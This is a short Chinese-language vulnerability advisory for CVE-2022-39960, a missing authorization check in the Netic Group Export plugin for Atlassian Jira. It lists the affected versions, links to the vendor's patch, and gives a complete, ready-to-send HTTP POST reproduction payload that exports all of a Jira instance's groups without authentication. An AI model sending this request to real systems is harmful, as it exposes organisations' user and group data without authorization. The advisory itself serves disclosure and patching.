漏洞说明

Atlassian Jira是澳大利亚Atlassian公司的一套缺陷跟踪管理系统。该系统主要用于对工作中各类问题、缺陷进行跟踪管理。
Atlassian Jira Netic Group Export 1.0.3之前版本存在安全漏洞,该漏洞源于不执行授权检查。 这可能允许未经身份验证的用户通过向plugins/servlet/groupexportforjira/admin/ URI发出groupexport_download=true请求,从Jira实例中导出所有组。

影响版本

  • Atlassian Jira Netic Group Export 1.0.3之前

漏洞复现

payload:

POST /plugins/servlet/groupexportforjira/admin/json HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 51
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate

groupexport_searchstring=&groupexport_download=true

CVE-2022-39960.png

修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
https://marketplace.atlassian.com/apps/1222388/group-export-for-jira/version-history